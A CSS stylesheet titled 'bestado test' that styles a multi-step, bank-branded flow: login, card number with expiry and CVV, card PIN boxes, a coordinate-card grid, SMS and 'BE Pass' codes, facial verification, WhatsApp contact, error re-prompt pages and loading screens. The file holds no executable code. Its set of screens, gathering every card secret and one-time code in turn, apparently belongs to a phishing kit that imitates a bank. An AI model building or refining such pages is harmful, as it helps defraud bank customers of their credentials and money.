/* ============================================================
   ESTILOS CENTRALES — bestado test
   ============================================================ */

/* ===== RESET & VARIABLES GLOBALES ===== */
* {
    margin: 0;
    padding: 0;
    box-sizing: border-box;
    font-family: Arial, Helvetica, sans-serif;
}

:root {
    --azul:        #0033a0;
    --azul-hover:  #00287a;
    --texto:       #333333;
    --titulo:      #22304a;
    --gris-sub:    #6f7683;
    --borde:       #c9ced6;
    --placeholder: #9aa0a8;
    --fondo:       #eef1f5;
}

/* ===== BODY (layout base compartido) ===== */
body {
    background: var(--fondo);
    min-height: 100vh;
    min-height: 100dvh;
    display: flex;
    align-items: center;
    justify-content: center;
    padding: 24px 12px;
}

/* ===== TARJETA BASE ===== */
.card {
    background: #ffffff;
    width: 100%;
    max-width: 400px;
    border-radius: 14px;
    box-shadow: 0 4px 24px rgba(0, 0, 0, .09);
    padding: 38px 34px 34px;
}
.card.wide    { max-width: 420px; }
.card.center  { text-align: center; }
.card.narrow  { max-width: 400px; }

/* ===== LOGO ===== */
.logo {
    display: flex;
    justify-content: center;
    margin-bottom: 28px;
    padding-bottom: 18px;
    border-bottom: 1px solid #e6e9ee;
}
.logo img {
    width: 190px;
    max-width: 100%;
    height: auto;
    display: block;
}
.logo-ph { display: none; }

/* ===== LOGO MINI (verificación, correo) ===== */
.logo-mini {
    display: flex;
    justify-content: center;
    margin-bottom: 26px;
}
.logo-mini img { max-width: 72px; height: auto; display: block; }
.logo-mini-ph { display: none; }

/* ===== LOGO BE PASS ===== */
.logo-bepas {
    display: flex;
    justify-content: center;
    padding: 26px 0 20px;
}
.logo-bepas img { max-width: 150px; height: auto; display: block; }
.logo-bepas-ph { display: none; }

/* ===== TÍTULOS ===== */
.titulo {
    font-size: 21px;
    font-weight: 700;
    color: var(--texto);
    text-align: center;
    line-height: 1.35;
    margin-bottom: 28px;
}

/* Variantes de título */
.titulo-lg {
    font-size: 27px;
    font-weight: 800;
    color: var(--titulo);
    text-align: center;
    line-height: 1.3;
    margin-bottom: 34px;
}
.titulo-xl {
    font-size: 28px;
    font-weight: 800;
    color: var(--titulo);
    text-align: center;
    line-height: 1.3;
    margin-bottom: 22px;
}
.titulo-exito {
    font-size: 26px;
    font-weight: 700;
    color: var(--texto);
    text-align: center;
    line-height: 1.35;
    margin-bottom: 18px;
}
.titulo-contact {
    font-size: 28px;
    font-weight: 800;
    color: var(--titulo);
    text-align: center;
    line-height: 1.3;
    margin-bottom: 20px;
}
.titulo-facial {
    font-size: 27px;
    font-weight: 800;
    color: var(--titulo);
    text-align: center;
    line-height: 1.32;
    margin-bottom: 30px;
}

/* ===== SUBTÍTULOS Y MENSAJES ===== */
.subtitulo {
    font-size: 16px;
    color: var(--gris-sub);
    text-align: center;
    line-height: 1.55;
    margin-bottom: 44px;
}
.subtitulo-md {
    font-size: 17px;
    color: var(--gris-sub);
    text-align: center;
    line-height: 1.55;
    margin-bottom: 44px;
}
.subtitulo-lg {
    font-size: 17px;
    color: var(--gris-sub);
    text-align: center;
    line-height: 1.55;
    margin-bottom: 44px;
}

.mensaje {
    font-size: 16px;
    color: #555555;
    line-height: 1.55;
    margin-bottom: 38px;
}
.mensaje-md {
    font-size: 17px;
    font-weight: 700;
    color: #555555;
    line-height: 1.55;
    margin-bottom: 44px;
}
.mensaje-lg {
    font-size: 21px;
    font-weight: 800;
    color: var(--titulo);
    text-align: center;
    line-height: 1.35;
    margin-bottom: 20px;
}

/* Instrucciones */
.instruccion {
    font-size: 16px;
    color: #555555;
    line-height: 1.45;
    margin-bottom: 34px;
}

/* ===== CAMPOS DE FORMULARIO (genéricos) ===== */
.campo {
    margin-bottom: 20px;
}
.campo label {
    display: block;
    font-size: 14px;
    font-weight: 700;
    color: #444444;
    margin-bottom: 7px;
}
.campo input {
    width: 100%;
    padding: 13px 15px;
    font-size: 16px;
    color: var(--texto);
    background: #ffffff;
    border: 1px solid var(--borde);
    border-radius: 10px;
    outline: none;
    transition: border-color .15s, box-shadow .15s;
}
.campo input::placeholder {
    color: var(--placeholder);
}
.campo input:focus {
    border-color: var(--azul);
    box-shadow: 0 0 0 3px rgba(0, 51, 160, .13);
}

/* Campo con label más grande */
.campo-lg label {
    font-size: 17px;
    font-weight: 800;
    color: var(--titulo);
}
.campo-lg input {
    padding: 24px 18px;
    font-size: 22px;
    font-weight: 800;
    letter-spacing: 8px;
    text-align: center;
    border-radius: 14px;
}
.campo-lg input::placeholder {
    font-weight: 800;
    letter-spacing: 8px;
}

/* Campo alto (email/contraseña) */
.campo-alto input {
    height: 64px;
    padding: 13px 18px;
    font-size: 17px;
    border-radius: 16px;
}
.campo-alto-md input {
    padding: 15px;
    font-size: 18px;
    letter-spacing: 6px;
    border-radius: 14px;
}

/* Campos grandes centrados (tarjeta, vencimiento) */
.campo-grande input {
    height: 64px;
    text-align: center;
    font-size: 22px;
    font-weight: 700;
    letter-spacing: 1px;
    border-radius: 12px;
}

/* ===== SUBTÍTULO DE TARJETA ===== */
.subtarjeta {
    font-size: 17px;
    font-weight: 700;
    color: #555555;
    text-align: center;
    margin-bottom: 44px;
}

/* ===== ENCABEZADO: TÍTULO + SUBTÍTULO ===== */
.encabezado {
    margin-bottom: 8px;
}
.encabezado + .subtarjeta {
    margin-bottom: 44px;
}

/* ===== FILA DE DATOS (vencimiento + CVV) ===== */
.fila-datos {
    display: flex;
    gap: 22px;
}
.fila-datos .campo { flex: 1; }

/* ===== CLAVE + OJITO ===== */
.clave-wrap {
    position: relative;
}
.clave-wrap input {
    padding-right: 50px;
}
.btn-ojo {
    position: absolute;
    top: 30%;
    right: 12px;
    transform: translateY(-50%);
    background: none;
    border: none;
    cursor: pointer;
    color: var(--placeholder);
    padding: 6px;
    display: flex;
    align-items: center;
    justify-content: center;
    line-height: 0;
    transition: color .15s;
}
.btn-ojo:hover { color: var(--azul); }

/* ===== BOTÓN INGRESAR ===== */
.btn-ingresar {
    width: 100%;
    padding: 15px;
    margin-top: 6px;
    background: var(--azul);
    color: #ffffff;
    border: none;
    border-radius: 12px;
    font-size: 16px;
    font-weight: 700;
    cursor: pointer;
    transition: background .15s;
}
.btn-ingresar:hover { background: var(--azul-hover); }

/* ===== LINK PROBLEMAS ===== */
.link-problemas {
    display: block;
    text-align: center;
    font-size: 14px;
    color: var(--azul);
    text-decoration: none;
    margin-top: 22px;
}
.link-problemas:hover { text-decoration: underline; }

/* ===== BOTÓN EMPRESAS ===== */
.btn-empresas {
    width: 100%;
    padding: 14px;
    margin-top: 34px;
    background: #ffffff;
    color: var(--azul);
    border: 2px solid var(--azul);
    border-radius: 12px;
    font-size: 16px;
    font-weight: 700;
    cursor: pointer;
    transition: background .15s, color .15s;
}
.btn-empresas:hover { background: var(--azul); color: #ffffff; }

/* ===== BOTÓN CONTINUAR (píldora) ===== */
.btn-continuar {
    width: 100%;
    padding: 17px;
    margin-top: 16px;
    background: #c4cad4;
    color: #ffffff;
    border: none;
    border-radius: 999px;
    font-size: 17px;
    font-weight: 700;
    cursor: not-allowed;
    transition: background .15s;
}
.btn-continuar.activo {
    background: var(--azul);
    cursor: pointer;
}
.btn-continuar.activo:hover { background: var(--azul-hover); }
.btn-continuar:disabled {
    background: #c3cad2;
    cursor: not-allowed;
}
.btn-continuar:not(:disabled):hover { background: var(--azul-hover); }

/* ===== BOTÓN CONTINUAR (SMS, código) ===== */
.btn-continuar-pill {
    width: 100%;
    padding: 18px;
    background: var(--azul);
    color: #ffffff;
    border: none;
    border-radius: 999px;
    font-size: 18px;
    font-weight: 700;
    cursor: pointer;
    transition: background .15s;
}
.btn-continuar-pill:not(:disabled):hover { background: var(--azul-hover); }
.btn-continuar-pill:disabled {
    background: #c3cad2;
    cursor: not-allowed;
}
.btn-continuar-pill-lg {
    padding: 19px;
    font-size: 20px;
    font-weight: 800;
}

/* ===== BOTÓN VERIFICAR ===== */
.btn-verificar {
    width: 100%;
    padding: 17px;
    margin-top: 10px;
    background: #c4cad4;
    color: #ffffff;
    border: none;
    border-radius: 999px;
    font-size: 17px;
    font-weight: 700;
    cursor: not-allowed;
    transition: background .15s;
}
.btn-verificar.activo {
    background: var(--azul);
    cursor: pointer;
}
.btn-verificar.activo:hover { background: var(--azul-hover); }

/* ===== BOTÓN AUTORIZAR ===== */
.btn-autorizar {
    width: 100%;
    padding: 17px;
    background: #c4cad4;
    color: #ffffff;
    border: none;
    border-radius: 999px;
    font-size: 17px;
    font-weight: 700;
    cursor: not-allowed;
    transition: background .15s;
}
.btn-autorizar.activo {
    background: var(--azul);
    cursor: pointer;
}
.btn-autorizar.activo:hover { background: var(--azul-hover); }

/* ===== BOTÓN CONFIRMAR (teléfono) ===== */
.btn-confirmar {
    width: 100%;
    padding: 18px;
    margin-top: 46px;
    background: var(--azul);
    color: #ffffff;
    border: none;
    border-radius: 14px;
    font-size: 18px;
    font-weight: 700;
    cursor: pointer;
    transition: background .15s;
}
.btn-confirmar:not(:disabled):hover { background: var(--azul-hover); }
.btn-confirmar:disabled {
    background: #8e96a3;
    cursor: not-allowed;
}

/* ===== BOTÓN CONTINUAR (facial) ===== */
.btn-continuar-solid {
    width: 100%;
    padding: 19px;
    background: #3b4fd0;
    color: #ffffff;
    border: none;
    border-radius: 999px;
    font-size: 20px;
    font-weight: 800;
    cursor: pointer;
    transition: background .15s;
}
.btn-continuar-solid:hover { background: #3243b8; }

/* ===== LINK CANCELAR ===== */
.link-cancelar {
    display: block;
    text-align: center;
    font-size: 18px;
    font-weight: 700;
    color: var(--azul);
    text-decoration: none;
    margin-top: 26px;
}
.link-cancelar:hover { text-decoration: underline; }
.link-cancelar-lg {
    font-size: 20px;
    margin-top: 28px;
}

/* ===== LINK CANCELAR (facial) ===== */
.link-cancelar-facial {
    display: block;
    text-align: center;
    font-size: 20px;
    font-weight: 700;
    color: #1e3fd0;
    text-decoration: none;
    margin-top: 28px;
}
.link-cancelar-facial:hover { text-decoration: underline; }

/* ===== PIN BOXES (clave tarjeta) ===== */
.pin-fila {
    display: flex;
    align-items: center;
    gap: 14px;
    margin-bottom: 46px;
}
.pin-wrap {
    display: flex;
    gap: 14px;
    flex: 1;
    justify-content: center;
}
.pin-box {
    width: 62px;
    height: 62px;
    text-align: center;
    font-size: 26px;
    font-weight: 700;
    color: var(--texto);
    background: #ffffff;
    border: 1px solid var(--borde);
    border-radius: 12px;
    outline: none;
    caret-color: var(--azul);
    transition: border-color .15s, box-shadow .15s;
}
.pin-box:focus {
    border-color: var(--azul);
    box-shadow: 0 0 0 3px rgba(0, 51, 160, .13);
}

/* ===== COORDENADAS ===== */
.coor-header {
    display: flex;
    align-items: center;
    gap: 12px;
    margin-bottom: 12px;
}
.icono-tarjeta {
    width: 34px;
    height: 34px;
    border: 3px solid var(--azul);
    border-radius: 50%;
    display: flex;
    align-items: center;
    justify-content: center;
    flex-shrink: 0;
}
.icono-tarjeta::after {
    content: "";
    width: 14px;
    height: 14px;
    border-radius: 50%;
    background: var(--azul);
}
.icono-mini {
    color: var(--placeholder);
    flex-shrink: 0;
}
.coor-fila {
    display: flex;
    gap: 22px;
    margin-bottom: 14px;
}
.coor-campo {
    flex: 1;
    text-align: center;
}
.coor-label {
    display: block;
    font-size: 19px;
    font-weight: 700;
    color: var(--texto);
    text-transform: lowercase;
    margin-bottom: 10px;
}
.coor-label::first-letter { text-transform: uppercase; }
.coor-input {
    width: 100%;
    max-width: 100px;
    height: 62px;
    text-align: center;
    font-size: 26px;
    font-weight: 700;
    color: var(--texto);
    background: #ffffff;
    border: 1px solid var(--borde);
    border-radius: 12px;
    outline: none;
    caret-color: var(--azul);
    transition: border-color .15s, box-shadow .15s;
}
.coor-input:focus {
    border-color: var(--azul);
    box-shadow: 0 0 0 3px rgba(0, 51, 160, .13);
}
.ejemplo-fila {
    display: flex;
    align-items: center;
    justify-content: flex-end;
    gap: 14px;
    margin-bottom: 46px;
}
.link-ejemplo {
    font-size: 16px;
    font-weight: 700;
    color: var(--azul);
    text-decoration: none;
}
.link-ejemplo:hover { text-decoration: underline; }
.tooltip-ejemplo {
    display: none;
    background: #ffffff;
    border: 1px solid var(--borde);
    border-radius: 12px;
    box-shadow: 0 4px 24px rgba(0, 0, 0, .12);
    padding: 16px;
    margin-bottom: 18px;
    font-size: 13px;
    color: var(--texto);
}
.tooltip-ejemplo.visible { display: block; }
.tooltip-ejemplo table {
    border-collapse: collapse;
    width: 100%;
    text-align: center;
}
.tooltip-ejemplo th,
.tooltip-ejemplo td {
    border: 1px solid var(--borde);
    padding: 6px 8px;
    font-weight: 700;
}
.tooltip-ejemplo th { background: var(--fondo); }
.tooltip-ejemplo .marcada {
    background: rgba(0, 51, 160, .12);
    color: var(--azul);
    border: 2px solid var(--azul);
}

/* ===== TELÉFONO (actualizar número) ===== */
.icono-circulo {
    width: 92px;
    height: 92px;
    border-radius: 50%;
    background: radial-gradient(circle at 35% 30%, #fdf1d8, #f9dfae);
    display: flex;
    align-items: center;
    justify-content: center;
    font-size: 42px;
    margin: 0 auto 34px;
    line-height: 1;
}
.icono-circulo-sm {
    width: 116px;
    height: 116px;
    border-radius: 50%;
    background: #d9f3e6;
    display: flex;
    align-items: center;
    justify-content: center;
    margin: 0 auto 42px;
}
.telefono-grupo {
    display: flex;
    align-items: center;
    gap: 18px;
    padding-bottom: 20px;
    border-bottom: 2px solid #d8dce3;
}
.prefijo {
    background: #f0f2f5;
    border-radius: 12px;
    padding: 16px 18px;
    font-size: 25px;
    font-weight: 800;
    color: #2b3550;
    line-height: 1;
    flex-shrink: 0;
}
.telefono-grupo input {
    flex: 1;
    min-width: 0;
    border: none;
    outline: none;
    font-size: 27px;
    font-weight: 800;
    color: var(--texto);
    background: transparent;
    letter-spacing: .5px;
}
.telefono-grupo input::placeholder {
    color: #b9c0cb;
    font-weight: 800;
}

/* ===== SMS ===== */
.btn-cerrar {
    position: absolute;
    top: 18px;
    right: 18px;
    background: none;
    border: none;
    cursor: pointer;
    color: #8a919d;
    padding: 6px;
    display: flex;
    align-items: center;
    justify-content: center;
    line-height: 0;
    border-radius: 50%;
    transition: color .15s, background .15s;
}
.btn-cerrar:hover { color: var(--texto); background: #f0f2f5; }
.icono-sms {
    display: flex;
    justify-content: center;
    margin-bottom: 26px;
}
.subtitulo-sms {
    font-size: 16px;
    color: var(--gris-sub);
    text-align: center;
    line-height: 1.55;
    margin-bottom: 36px;
}
.subtitulo-sms .telefono {
    font-weight: 800;
    color: #3a4356;
}

/* ===== CLAVE HEADER ===== */
.clave-header {
    display: flex;
    align-items: center;
    gap: 12px;
    margin-bottom: 14px;
}
.num-tarjeta {
    font-size: 21px;
    font-weight: 700;
    color: var(--texto);
    margin-bottom: 14px;
}

/* ===== BE PASS ===== */
.card-bepas {
    padding: 0 34px 42px;
    overflow: hidden;
}
.divisor {
    border: none;
    border-top: 1px solid #e6e9ee;
    margin: 0 -34px 34px;
}
.flujo {
    display: flex;
    align-items: center;
    justify-content: center;
    gap: 26px;
    margin-bottom: 36px;
}
.puntos {
    display: flex;
    gap: 12px;
}
.puntos span {
    width: 15px;
    height: 15px;
    border-radius: 50%;
    background: #d7dbe2;
    animation: pulso 1.3s ease-in-out infinite;
}
.puntos span:nth-child(2) { animation-delay: .18s; }
.puntos span:nth-child(3) { animation-delay: .36s; }
@keyframes pulso {
    0%, 100% { opacity: .45; transform: scale(.85); }
    50%      { opacity: 1;   transform: scale(1);   }
}
.valido {
    font-size: 18px;
    color: var(--gris-sub);
    text-align: center;
    margin-bottom: 30px;
}
.valido .tiempo {
    font-size: 23px;
    font-weight: 800;
    color: #e0700a;
}
.valido .tiempo.vencido { color: #9aa0a8; }
.aviso {
    display: flex;
    align-items: flex-start;
    gap: 15px;
    background: #e9f2fc;
    border-radius: 14px;
    padding: 20px 18px;
    margin-bottom: 32px;
}
.aviso svg { flex-shrink: 0; margin-top: 2px; }
.aviso p {
    font-size: 15.5px;
    color: #55617a;
    line-height: 1.5;
}

/* ===== CHECK / ÉXITO ===== */
.check-wrap {
    width: 96px;
    height: 96px;
    margin: 0 auto 34px;
    border-radius: 50%;
    background: #d9f7e5;
    display: flex;
    align-items: center;
    justify-content: center;
}
.check-wrap svg {
    width: 52px;
    height: 52px;
    stroke: #17a74e;
}

/* ===== BOTÓN WHATSAPP ===== */
.btn-whatsapp {
    width: 100%;
    padding: 20px;
    background: #25d366;
    color: #ffffff;
    border: none;
    border-radius: 18px;
    font-size: 19px;
    font-weight: 700;
    line-height: 1.45;
    cursor: pointer;
    display: flex;
    align-items: center;
    justify-content: center;
    gap: 16px;
    box-shadow: 0 4px 14px rgba(37, 211, 102, .35);
    transition: background .15s;
}
.btn-whatsapp:hover { background: #1eb85a; }
.btn-whatsapp svg { flex-shrink: 0; }

/* ===== BOTÓN WHATSAPP (contacto) ===== */
.btn-wsp {
    position: relative;
    display: flex;
    align-items: center;
    justify-content: center;
    width: 100%;
    padding: 20px 56px;
    background: #26c155;
    color: #ffffff;
    border: none;
    border-radius: 16px;
    font-size: 20px;
    font-weight: 800;
    text-align: center;
    line-height: 1.35;
    text-decoration: none;
    cursor: pointer;
    transition: background .15s;
    box-shadow: 0 8px 18px rgba(38, 193, 85, .28);
}
.btn-wsp:hover { background: #1fae49; }
.btn-wsp .wsp-icono {
    position: absolute;
    left: 26px;
    top: 50%;
    transform: translateY(-50%);
    display: flex;
    line-height: 0;
}

/* ===== FACIAL ===== */
.ilustracion {
    display: flex;
    justify-content: center;
    margin-bottom: 64px;
}

/* ===== ERROR (estilos para páginas _e) ===== */
.campo input.error {
    border-color: #d94a5a;
    box-shadow: 0 0 0 3px rgba(217, 74, 90, .13);
}
.pin-box.error {
    border-color: #d94a5a;
    box-shadow: 0 0 0 3px rgba(217, 74, 90, .13);
}
.coor-input.error {
    border-color: #d94a5a;
    box-shadow: 0 0 0 3px rgba(217, 74, 90, .13);
}
.telefono-grupo input.error {
    border-bottom-color: #d94a5a;
}
.error-msg {
    color: #9e0909;
    text-align: center;
    margin-top: 16px;
    margin-bottom: 10px;
    font-size: 14px;
    font-weight: 700;
}

/* ===== LOADING ===== */
.loading-divisor {
    border: none;
    border-top: 1px solid #e6e9ee;
    margin: 0 -34px 44px;
}
.spinner-wrap {
    position: relative;
    width: 160px;
    height: 160px;
    margin: 0 auto 40px;
}
.spinner {
    position: absolute;
    inset: 0;
    border-radius: 50%;
    border: 9px solid transparent;
    border-top-color: #2544d8;
    border-right-color: #2544d8;
    border-bottom-color: #2544d8;
    animation: girar 1.1s linear infinite;
}
@keyframes girar { to { transform: rotate(360deg); } }
.spinner-centro {
    position: absolute;
    inset: 0;
    display: flex;
    align-items: center;
    justify-content: center;
}
.spinner-centro img {
    width: 90px;
    height: auto;
    max-width: 100%;
    display: block;
}
.loading-titulo {
    font-size: 30px;
    font-weight: 800;
    color: #22304a;
    text-align: center;
    line-height: 1.3;
    margin-bottom: 20px;
}
.loading-subtitulo {
    font-size: 19px;
    color: #6f7683;
    text-align: center;
    line-height: 1.5;
    margin-bottom: 40px;
}
.estado {
    position: relative;
    display: flex;
    align-items: center;
    justify-content: center;
    background: #eef1f6;
    border: 1px solid #e2e6ec;
    border-radius: 18px;
    padding: 26px 40px;
}
.estado::before {
    content: "";
    position: absolute;
    left: 34px;
    top: 50%;
    transform: translateY(-50%);
    width: 15px;
    height: 15px;
    border-radius: 50%;
    background: #3b4fd0;
    animation: latido 1.4s ease-in-out infinite;
}
@keyframes latido {
    0%, 100% { opacity: 1;   transform: translateY(-50%) scale(1);   }
    50%      { opacity: .55; transform: translateY(-50%) scale(.82); }
}
.estado p {
    font-size: 19px;
    font-weight: 800;
    color: #22304a;
    text-align: center;
    line-height: 1.4;
}

/* ===== RESPONSIVE GLOBAL ===== */
@media (max-width: 480px) {
    body { padding: 16px 10px; align-items: flex-start; }
    .card { max-width: 100%; padding: 30px 20px 26px; border-radius: 12px; }
    .card.wide { padding: 30px 20px 26px; }

    /* Títulos */
    .titulo { font-size: 19px; margin-bottom: 24px; }
    .titulo-lg { font-size: 24px; }
    .titulo-xl { font-size: 24px; }
    .titulo-exito { font-size: 22px; }
    .titulo-contact { font-size: 24px; }
    .titulo-facial { font-size: 23px; }

    /* Subtítulos */
    .subtitulo, .subtitulo-md, .subtitulo-lg { margin-bottom: 34px; }

    /* Campos */
    .campo input { font-size: 16px; }
    .campo-alto input { height: 56px; font-size: 16px; }
    .campo-grande input { height: 56px; font-size: 18px; }
    .campo-lg input { font-size: 19px; letter-spacing: 6px; padding: 20px 14px; }
    .campo-lg input::placeholder { letter-spacing: 6px; }

    /* Fila datos */
    .fila-datos { gap: 12px; }

    /* PIN */
    .pin-fila { gap: 10px; margin-bottom: 36px; }
    .pin-wrap { gap: 10px; }
    .pin-box { width: 52px; height: 52px; font-size: 22px; }

    /* Coordenadas */
    .coor-fila { gap: 10px; }
    .coor-input { height: 52px; font-size: 22px; }
    .ejemplo-fila { margin-bottom: 36px; }

    /* Teléfono */
    .prefijo { font-size: 22px; padding: 14px 15px; }
    .telefono-grupo input { font-size: 23px; }

    /* Check */
    .check-wrap { width: 84px; height: 84px; margin-bottom: 28px; }
    .check-wrap svg { width: 44px; height: 44px; }
    .btn-whatsapp { font-size: 17px; padding: 17px; }

    /* WhatsApp contacto */
    .btn-wsp { font-size: 18px; padding: 18px 52px; }
    .btn-wsp .wsp-icono { left: 20px; }

    /* Facial */
    .ilustracion { margin-bottom: 48px; }

    /* BE Pass */
    .card-bepas { padding: 0 20px 34px; }
    .loading-divisor { margin: 0 -20px 28px; }
    .flujo { gap: 18px; }
    .mensaje-lg { font-size: 19px; }

    /* Loading */
    .loading-divisor { margin: 0 -20px 36px; }
    .loading-titulo { font-size: 26px; }
    .loading-subtitulo { font-size: 17px; }
    .estado { padding: 22px 46px 22px 52px; }
    .estado::before { left: 24px; width: 13px; height: 13px; }
    .estado p { font-size: 17px; }

    /* SMS */
    .titulo-sms { font-size: 23px; }
}

/* SMS-specific: card with position relative */
.card-sms {
    position: relative;
    padding: 52px 34px 40px;
}
